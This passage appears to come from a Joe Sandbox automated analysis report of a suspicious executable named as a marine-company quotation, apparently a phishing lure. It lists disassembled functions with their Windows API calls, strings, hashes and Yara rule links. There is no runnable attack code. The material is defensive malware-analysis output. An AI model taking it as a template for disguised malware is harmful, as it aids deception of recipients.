                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: ClassName$Window$Text$BuffCharRectUpper
                                                                            • String ID: ThumbnailClass
                                                                            • API String ID: 3725905772-1241985126
                                                                            • Opcode ID: d96a9cb9be4b7bd72d25ab42aa497b17b703549082c82b5119c4d3beafc0cd44
                                                                            • Instruction ID: dfb48ef4093b8ffa059bb40225feb50dae36863d1bd420e7afca50f24386e1eb
                                                                            • Opcode Fuzzy Hash: d96a9cb9be4b7bd72d25ab42aa497b17b703549082c82b5119c4d3beafc0cd44
                                                                            • Instruction Fuzzy Hash: 4A917A711082059FDF04DF14C985FAA77EEEF84314F04846AED899A69ADF30ED46CBA1
                                                                            Function 006B055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WSAStartup.WSOCK32(00000101,?), ref: 006B05BC
                                                                            • inet_addr.WSOCK32(?), ref: 006B061C
                                                                            • gethostbyname.WSOCK32(?), ref: 006B0628
                                                                            • IcmpCreateFile.IPHLPAPI ref: 006B0636
                                                                            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 006B06C6
                                                                            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 006B06E5
                                                                            • IcmpCloseHandle.IPHLPAPI(?), ref: 006B07B9
                                                                            • WSACleanup.WSOCK32 ref: 006B07BF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                            • String ID: Ping
                                                                            • API String ID: 1028309954-2246546115
                                                                            • Opcode ID: f11783d7f324730a3fb49f22a7c6f9308601cc68b7c98688564c9d6976ba0aff
                                                                            • Instruction ID: 437c82ebe973a49e728510c3fedb892ae6441d768b9285ca17b6971f8bb96635
                                                                            • Opcode Fuzzy Hash: f11783d7f324730a3fb49f22a7c6f9308601cc68b7c98688564c9d6976ba0aff
                                                                            • Instruction Fuzzy Hash: FD918EB55042019FE720CF15C588F9BBBE2AF44318F1485A9F4698B7A2CB70ED85CF91
                                                                            Function 006B372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CoInitialize.OLE32 ref: 006B3774
                                                                            • CoUninitialize.OLE32 ref: 006B377F
                                                                            • CoCreateInstance.OLE32(?,00000000,00000017,006CFB78,?), ref: 006B37D9
                                                                            • IIDFromString.OLE32(?,?), ref: 006B384C
                                                                            • VariantInit.OLEAUT32(?), ref: 006B38E4
                                                                            • VariantClear.OLEAUT32(?), ref: 006B3936
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                            • API String ID: 636576611-1287834457
                                                                            • Opcode ID: fe1da599440e100c053bf4e00530110f9bb00e43a95bcd9c5458d061cd4d4b99
                                                                            • Instruction ID: 56a4849acb614bbe32741f39689b34b3f815625c08f0a7b6a999b32da266854d
                                                                            • Opcode Fuzzy Hash: fe1da599440e100c053bf4e00530110f9bb00e43a95bcd9c5458d061cd4d4b99
                                                                            • Instruction Fuzzy Hash: 60618DB0708321AFD710DF54C848BAABBEAAF45710F00481DF5859B391DB70EE89CB96
                                                                            Function 0069DC0E Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 178COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0069DC20
                                                                            • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0069DC46
                                                                            • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0069DCBC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: FileInfoVersion$QuerySizeValue
                                                                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                            • API String ID: 2179348866-1459072770
                                                                            • Opcode ID: 187ea65263315a8e177aac7479d03404c0f3a6bafd71616a1b04561c9d2a0dcf
                                                                            • Instruction ID: 3a67dbc862bc61229d42264b6d980ac7fd67790b1e6eeb384ee8a327312bf279
                                                                            • Opcode Fuzzy Hash: 187ea65263315a8e177aac7479d03404c0f3a6bafd71616a1b04561c9d2a0dcf
                                                                            • Instruction Fuzzy Hash: 01412432940205BADB54AB74DC07EFF776EEF42761F10006EF905E6182EB749A0597B8
                                                                            Function 006C8B02 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 149windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00649BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00649BB2
                                                                              • Part of subcall function 0064912D: GetCursorPos.USER32(?), ref: 00649141
                                                                              • Part of subcall function 0064912D: ScreenToClient.USER32(00000000,?), ref: 0064915E
                                                                              • Part of subcall function 0064912D: GetAsyncKeyState.USER32(00000001), ref: 00649183
                                                                              • Part of subcall function 0064912D: GetAsyncKeyState.USER32(00000002), ref: 0064919D
                                                                            • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 006C8B6B
                                                                            • ImageList_EndDrag.COMCTL32 ref: 006C8B71
                                                                            • ReleaseCapture.USER32 ref: 006C8B77
                                                                            • SetWindowTextW.USER32(?,00000000), ref: 006C8C12
                                                                            • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 006C8C25
                                                                            • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 006C8CFF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                            • String ID: @GUI_DRAGFILE$@GUI_DROPID$p#p
                                                                            • API String ID: 1924731296-746741009
                                                                            • Opcode ID: ecb0351256a6622d8f8fd7cd4b792cd7ce2025330dbe5808547cb0e4393d2923
                                                                            • Instruction ID: e7ec727686eb923ae4fea9d9bf3e46e50aa490bac95e3ec6927cebc707b81948
                                                                            • Opcode Fuzzy Hash: ecb0351256a6622d8f8fd7cd4b792cd7ce2025330dbe5808547cb0e4393d2923
                                                                            • Instruction Fuzzy Hash: A7518A70204204AFD714DF14D896FBA77E6FB88710F40062DF996672E1CB74A944CBA6
                                                                            Function 006A3388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 006A33CF
                                                                            • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 006A33F0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: LoadString
                                                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                            • API String ID: 2948472770-3080491070
                                                                            • Opcode ID: c56506f33e8496ed482c23ce7fde5ce1dd51d25693573e476192db9fbe349e63
                                                                            • Instruction ID: 2a7cd7f6aa2541968203d6645dd322f1c2eb3371f9a10d7f231547062dbe879b
                                                                            • Opcode Fuzzy Hash: c56506f33e8496ed482c23ce7fde5ce1dd51d25693573e476192db9fbe349e63
                                                                            • Instruction Fuzzy Hash: 1D519D71C00219AADF15EBA0CD42EEEB77AEF05300F108169F505722A2EB752F58DFA4
                                                                            Function 006A5393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 006A53A0
                                                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 006A5416
                                                                            • GetLastError.KERNEL32 ref: 006A5420
                                                                            • SetErrorMode.KERNEL32(00000000,READY), ref: 006A54A7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Error$Mode$DiskFreeLastSpace
                                                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                            • API String ID: 4194297153-14809454
                                                                            • Opcode ID: 0e84cc7aba6c90765c4d67ce3a0fa9a73198b1b714a4d15d7a6472725be789b1
                                                                            • Instruction ID: 940cdfa53bb05569d055e9eadb2654942e4ed0d01cc7ba250c8c7bc6f667026a
                                                                            • Opcode Fuzzy Hash: 0e84cc7aba6c90765c4d67ce3a0fa9a73198b1b714a4d15d7a6472725be789b1
                                                                            • Instruction Fuzzy Hash: 05319135A006049FC710EF68C484AE9BBF6EF5A305F188069E506DB352DB70DD86CF90
                                                                            Function 006C3C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateMenu.USER32 ref: 006C3C79
                                                                            • SetMenu.USER32(?,00000000), ref: 006C3C88
                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006C3D10
                                                                            • IsMenu.USER32(?), ref: 006C3D24
                                                                            • CreatePopupMenu.USER32 ref: 006C3D2E
                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 006C3D5B
                                                                            • DrawMenuBar.USER32 ref: 006C3D63
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                            • String ID: 0$F
                                                                            • API String ID: 161812096-3044882817
                                                                            • Opcode ID: 2844f588ce750d5d8624d36e2ce9009b69c55bc84b33a04fd3c6178a37ce391a
                                                                            • Instruction ID: 9852ffae82777c9d453456779687833d2866faa9e6adab2611f287efbb4026fc
                                                                            • Opcode Fuzzy Hash: 2844f588ce750d5d8624d36e2ce9009b69c55bc84b33a04fd3c6178a37ce391a
                                                                            • Instruction Fuzzy Hash: 74414775A01219EFDB14CF64D854FEA7BB6FF49350F14402DE94AA7360D731AA10CB94
                                                                            Function 00691EDF Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00693CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00693CCA
                                                                            • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00691F64
                                                                            • GetDlgCtrlID.USER32 ref: 00691F6F
                                                                            • GetParent.USER32 ref: 00691F8B
                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00691F8E
                                                                            • GetDlgCtrlID.USER32(?), ref: 00691F97
                                                                            • GetParent.USER32(?), ref: 00691FAB
                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00691FAE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CtrlParent$ClassName
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 2573188126-1403004172
                                                                            • Opcode ID: 83c5bafbc6515a8eba34810b11080441baf43b20679af4bb8768ebb6d355532d
                                                                            • Instruction ID: ed7e260bd5351b4080c563b8aa6b0ed49117e078f1dc4eae863489ea1074a690
                                                                            • Opcode Fuzzy Hash: 83c5bafbc6515a8eba34810b11080441baf43b20679af4bb8768ebb6d355532d
                                                                            • Instruction Fuzzy Hash: 7921D470900218BBCF05AFA0CC85DFEBBBAEF06310F101519F965A7291CB755905DB74
                                                                            Function 00691FC0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00693CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00693CCA
                                                                            • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00692043
                                                                            • GetDlgCtrlID.USER32 ref: 0069204E
                                                                            • GetParent.USER32 ref: 0069206A
                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 0069206D
                                                                            • GetDlgCtrlID.USER32(?), ref: 00692076
                                                                            • GetParent.USER32(?), ref: 0069208A
                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 0069208D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CtrlParent$ClassName
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 2573188126-1403004172
                                                                            • Opcode ID: 98e149a56844a61d0b52054da505756dcf51e2e3dadc3e0db41eb3dfc3e9867e
                                                                            • Instruction ID: 76920e33893ed28bf16a723293aeb772e692fd8d1bec29fe9b51cf069ea3f781
                                                                            • Opcode Fuzzy Hash: 98e149a56844a61d0b52054da505756dcf51e2e3dadc3e0db41eb3dfc3e9867e
                                                                            • Instruction Fuzzy Hash: 0F21F375D00218BBCF14AFA0CC95EFEBBBAEF05310F00140AF955A72A1CA754915DB70
                                                                            Function 006B3C30 Relevance: 15.3, APIs: 10, Instructions: 344fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VariantInit.OLEAUT32(?), ref: 006B3C5C
                                                                            • CoInitialize.OLE32(00000000), ref: 006B3C8A
                                                                            • CoUninitialize.OLE32 ref: 006B3C94
                                                                            • GetRunningObjectTable.OLE32(00000000,?), ref: 006B3DB1
                                                                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 006B3ED5
                                                                            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 006B3F0E
                                                                            • CoGetObject.OLE32(?,00000000,006CFB98,?), ref: 006B3F2D
                                                                            • SetErrorMode.KERNEL32(00000000), ref: 006B3F40
                                                                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 006B3FC4
                                                                            • VariantClear.OLEAUT32(?), ref: 006B3FD8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                            • String ID:
                                                                            • API String ID: 2395222682-0
                                                                            • Opcode ID: f737ff67fbda0263baa47c6fd0922c53e3cf62182dceb205b8f99b60712e4415
                                                                            • Instruction ID: f001d77442bfea7753e560faf8a6abd281857101f897c375e09156661d3dae87
                                                                            • Opcode Fuzzy Hash: f737ff67fbda0263baa47c6fd0922c53e3cf62182dceb205b8f99b60712e4415
                                                                            • Instruction Fuzzy Hash: 42C135B16082119FD700DF68C8849ABBBEAFF89754F10491DF98A9B311DB30ED46CB52
                                                                            Function 006C3A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 006C3A9D
                                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 006C3AA0
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 006C3AC7
                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 006C3AEA
                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 006C3B62
                                                                            • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 006C3BAC
                                                                            • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 006C3BC7
                                                                            • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 006C3BE2
                                                                            • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 006C3BF6
                                                                            • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 006C3C13
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$LongWindow
                                                                            • String ID:
                                                                            • API String ID: 312131281-0
                                                                            • Opcode ID: 7939209823d00089838a35427055975ecc8051f0adca3034fc4776b75c7d5432
                                                                            • Instruction ID: 4db7a3e85cffc2a39ff6946b7404a707786e4b8a0f72509b584924b3c2e4f299
                                                                            • Opcode Fuzzy Hash: 7939209823d00089838a35427055975ecc8051f0adca3034fc4776b75c7d5432
                                                                            • Instruction Fuzzy Hash: BD616775A00258AFDB10DFA8CC81EFE77B9EB09710F108199FA15A73A1C774AE41DB64
                                                                            Function 0069B12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 0069B151
                                                                            • GetForegroundWindow.USER32(00000000,?,?,?,?,?,0069A1E1,?,00000001), ref: 0069B165
                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 0069B16C
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0069A1E1,?,00000001), ref: 0069B17B
                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 0069B18D
                                                                            • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0069A1E1,?,00000001), ref: 0069B1A6
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0069A1E1,?,00000001), ref: 0069B1B8
                                                                            • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0069A1E1,?,00000001), ref: 0069B1FD
                                                                            • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0069A1E1,?,00000001), ref: 0069B212
                                                                            • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0069A1E1,?,00000001), ref: 0069B21D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                            • String ID:
                                                                            • API String ID: 2156557900-0
                                                                            • Opcode ID: 04100650cb9ced095bbd767dd24f56cf5603d8b300540a452f776ff61e618913
                                                                            • Instruction ID: d91289aa0f4e603cf259cb3cc1460b4b9f03c6d95e8793a63cca268908e91bee
                                                                            • Opcode Fuzzy Hash: 04100650cb9ced095bbd767dd24f56cf5603d8b300540a452f776ff61e618913
                                                                            • Instruction Fuzzy Hash: 90318E71500204EFDF109F25EE48FBD7BAFEB51321F14A115FA05DA690DBB8AA418F64
                                                                            Function 00631410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00631459
                                                                            • OleUninitialize.OLE32(?,00000000), ref: 006314F8
                                                                            • UnregisterHotKey.USER32(?), ref: 006316DD
                                                                            • DestroyWindow.USER32(?), ref: 006724B9
                                                                            • FreeLibrary.KERNEL32(?), ref: 0067251E
                                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0067254B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
